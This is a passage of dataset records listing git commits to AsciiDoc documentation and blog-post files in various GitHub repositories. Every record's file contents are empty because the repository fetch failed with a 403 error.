We should make this clear in the docs to help users avoid\r\nfrustrating startup problems.\r\n\r\nRelates #24260\r\n","repos":"GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scottso
m\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,jimczi\/elasticsearch,qwerty4030\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/setup\/install\/windows.asciidoc","new_file":"docs\/reference\/setup\/install\/windows.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2498648a3b8ed8156cdd549a7dcde914ad1f4729","subject":"Added translation to english of TPH-FollowUp_en.adoc - based on Google Translate","message":"Added translation to english of TPH-FollowUp_en.adoc - based on Google Translate\n","repos":"DIPSASA\/dips-ckm,bjornna\/dips-ckm","old_file":"doc\/determination\/TPH-FollowUp_en.adoc","new_file":"doc\/determination\/TPH-FollowUp_en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da0efcdb1413852c76526ffc665f12ef7f1da356","subject":"Added idempotentConsumer EIP base docs","message":"Added idempotentConsumer EIP base 
docs\n","repos":"pmoerenhout\/camel,pax95\/camel,apache\/camel,apache\/camel,akhettar\/camel,kevinearls\/camel,kevinearls\/camel,gautric\/camel,alvinkwekel\/camel,gautric\/camel,ullgren\/camel,christophd\/camel,onders86\/camel,kevinearls\/camel,dmvolod\/camel,rmarting\/camel,snurmine\/camel,punkhorn\/camel-upstream,tdiesler\/camel,tadayosi\/camel,curso007\/camel,pax95\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,sverkera\/camel,onders86\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,Fabryprog\/camel,kevinearls\/camel,christophd\/camel,isavin\/camel,mcollovati\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel,dmvolod\/camel,kevinearls\/camel,gnodet\/camel,jonmcewen\/camel,curso007\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,alvinkwekel\/camel,anoordover\/camel,pax95\/camel,zregvart\/camel,punkhorn\/camel-upstream,pax95\/camel,CodeSmell\/camel,mcollovati\/camel,Fabryprog\/camel,pax95\/camel,snurmine\/camel,anoordover\/camel,apache\/camel,cunningt\/camel,sverkera\/camel,alvinkwekel\/camel,akhettar\/camel,pmoerenhout\/camel,onders86\/camel,ullgren\/camel,davidkarlsen\/camel,DariusX\/camel,sverkera\/camel,onders86\/camel,gnodet\/camel,cunningt\/camel,gautric\/camel,ullgren\/camel,Fabryprog\/camel,jamesnetherton\/camel,rmarting\/camel,akhettar\/camel,pmoerenhout\/camel,gnodet\/camel,nicolaferraro\/camel,rmarting\/camel,jamesnetherton\/camel,jonmcewen\/camel,dmvolod\/camel,onders86\/camel,apache\/camel,anoordover\/camel,snurmine\/camel,onders86\/camel,objectiser\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,dmvolod\/camel,DariusX\/camel,tdiesler\/camel,isavin\/camel,dmvolod\/camel,CodeSmell\/camel,jamesnetherton\/camel,tdiesler\/camel,jamesnetherton\/camel,DariusX\/camel,gnodet\/camel,sverkera\/camel,nikhilvibhav\/camel,cunningt\/camel,curso007\/camel,nicolaferraro\/camel,pmoerenhout\/camel,anoordover\/camel,tadayosi\/camel,tadayosi\/camel,jamesnetherton\/camel,gautric\/camel,isavin\/camel,jonmcewen\/camel,ullgren\/camel,sverkera\/camel,zregvart\/camel,jonmcewen\/camel,zregvart\/camel,CodeSmell\/camel,rmarting\/camel,jonmcewen\/camel,cunningt\/camel,isavin\/camel,davidkarlsen\/camel,nicolaferraro\/camel,curso007\/camel,snurmine\/camel,davidkarlsen\/camel,curso007\/camel,rmarting\/camel,objectiser\/camel,snurmine\/camel,dmvolod\/camel,gautric\/camel,nikhilvibhav\/camel,adessaigne\/camel,Fabryprog\/camel,adessaigne\/camel,akhettar\/camel,jamesnetherton\/camel,tadayosi\/camel,DariusX\/camel,sverkera\/camel,mcollovati\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,objectiser\/camel,gautric\/camel,CodeSmell\/camel,isavin\/camel,isavin\/camel,christophd\/camel,mcollovati\/camel,kevinearls\/camel,cunningt\/camel,gnodet\/camel,curso007\/camel,cunningt\/camel,anoordover\/camel,snurmine\/camel,pmoerenhout\/camel,akhettar\/camel,christophd\/camel,jonmcewen\/camel,rmarting\/camel,akhettar\/camel,christophd\/camel,adessaigne\/camel,zregvart\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/idempotentConsumer-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/idempotentConsumer-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba57d05d603eb874b38fa48141d3c26527486d54","subject":"y2b create post Sony Dash Unboxing \\u0026 Overview","message":"y2b create post 
Sony Dash Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-23-Sony-Dash-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-03-23-Sony-Dash-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59e78dc2e15311ed89a4f67df27fbf23b0c63bd2","subject":"Update 2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","message":"Update 2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","new_file":"_posts\/2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"248e2d22443ccba7a0dc94b13f47a9e5bed3aac9","subject":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","message":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-30-4UniqueGadgetsYouDidntKnowExisted.adoc","new_file":"_posts\/2017-12-30-4UniqueGadgetsYouDidntKnowExisted.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6bd01029bacafbcb737f23b7225e52071072734","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d7b585501dfae5e760e606d7d94301af94e1d14","subject":"Update 2016-04-10-tcp-ip.adoc","message":"Update 2016-04-10-tcp-ip.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-tcp-ip.adoc","new_file":"_posts\/2016-04-10-tcp-ip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10d4245782925fc8db73edc15e6f191c3f2c0906","subject":"Update 2019-02-28-Perl10.adoc","message":"Update 
2019-02-28-Perl10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-28-Perl10.adoc","new_file":"_posts\/2019-02-28-Perl10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1406cc110072d2e919aae6fbe193e9f9df6de6f","subject":"Update 2016-04-06-Tenemos-un-problema.adoc","message":"Update 2016-04-06-Tenemos-un-problema.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241fb8d04b476a51b67f582f94fdcf6a082206ed","subject":"Update 2016-04-06-Tenemos-un-problema.adoc","message":"Update 2016-04-06-Tenemos-un-problema.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"196f706f1255b430ee094c5cb8da77e3f21e1dab","subject":"Update 2015-11-27-FormData-in-React-Native.adoc","message":"Update 2015-11-27-FormData-in-React-Native.adoc\n","repos":"doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io","old_file":"_posts\/2015-11-27-FormData-in-React-Native.adoc","new_file":"_posts\/2015-11-27-FormData-in-React-Native.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/doochik\/doochik.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c473ac3270052a5b6a98bb9eb269554a5ea2edf","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d748b628c1bdf7dd5164cff089ce92f38ef99764","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 
2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27ace78bd8a7e3a89bf4f4942144bf05c6a787cd","subject":"Update 2017-05-31-Controll-Flow-Statements.adoc","message":"Update 2017-05-31-Controll-Flow-Statements.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bac0541143ab1d13066600646f02f0b76dcd41ab","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c18cc901d02d6c793db19093e00c241e71a6f02","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"594bc81fad8dd3cd0a24e74adcd78fef12739698","subject":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","message":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"9946c5d00b8e9a68a6e1d83e2f4da4d8ee902d11","subject":"y2b create post The DIY Jacket Upgrade, Thank Me Later","message":"y2b create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-07-The-DIY-Jacket-Upgrade-Thank-Me-Later.adoc","new_file":"_posts\/2018-01-07-The-DIY-Jacket-Upgrade-Thank-Me-Later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73e9d9b25ae08ce461185c8a367e59d6f15fc8d7","subject":"First draft of the syntax rules","message":"First draft of the syntax rules\n","repos":"teozkr\/GearScript,teozkr\/GearScript","old_file":"Design\/Syntax.adoc","new_file":"Design\/Syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teozkr\/GearScript.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"998c03b5562e2d73a885a72cbc63545f6a514579","subject":"Deleted 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Deleted 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d2674505461a13e6d5ae32cc8b1fbe45fa8c593","subject":"y2b create post iPhone 5 Camera Test \\u0026 Review (iPhone 5 Camera Review - Still, Video \\u0026 Forward Facing Camera)","message":"y2b create post iPhone 5 Camera Test \\u0026 Review (iPhone 5 Camera Review - Still, Video \\u0026 Forward Facing Camera)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-21-iPhone-5-Camera-Test-u0026-Review-iPhone-5-Camera-Review--Still-Video-u0026-Forward-Facing-Camera.adoc","new_file":"_posts\/2012-09-21-iPhone-5-Camera-Test-u0026-Review-iPhone-5-Camera-Review--Still-Video-u0026-Forward-Facing-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d05da98a3cd4f5587e8cc7265e634c12ba5e03c6","subject":"update supported OS","message":"update supported OS\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89f815bc42dc9f04f5e0f6900f84fedc9acf18c3","subject":"Update 
2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbe2f29784d0908fe7c3a4bdfa5ee343664086a4","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cab9285199f615585323674ba4ebbbe467d98a2a","subject":"Update 2015-09-13-Lets-talk-about-mitigation.adoc","message":"Update 2015-09-13-Lets-talk-about-mitigation.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-09-13-Lets-talk-about-mitigation.adoc","new_file":"_posts\/2015-09-13-Lets-talk-about-mitigation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"310a271771f2a5fcdc65fa2e86d74f19c2de0884","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"315fbd86d2bf16a3762b8bcdc86d525e9fd22c69","subject":"Update 2014-09-23-Announcing-try-racketorg.adoc","message":"Update 2014-09-23-Announcing-try-racketorg.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-23-Announcing-try-racketorg.adoc","new_file":"_posts\/2014-09-23-Announcing-try-racketorg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3207e9ad785dc615ab4bca5138ef6fa1e6f9c0e2","subject":"Update 2015-11-18-New-in-the-family-part-2.adoc","message":"Update 
2015-11-18-New-in-the-family-part-2.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-18-New-in-the-family-part-2.adoc","new_file":"_posts\/2015-11-18-New-in-the-family-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7ac94a0222b744ea45901cab8d18cea673ad40","subject":"Update 2017-07-22-Acemice-Belki-Hadsizce-4.adoc","message":"Update 2017-07-22-Acemice-Belki-Hadsizce-4.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-07-22-Acemice-Belki-Hadsizce-4.adoc","new_file":"_posts\/2017-07-22-Acemice-Belki-Hadsizce-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b312063922eda1314d33a350dc4b1a1e3a0df7ca","subject":"Update 2016-10-25-Test-2.adoc","message":"Update 2016-10-25-Test-2.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-25-Test-2.adoc","new_file":"_posts\/2016-10-25-Test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 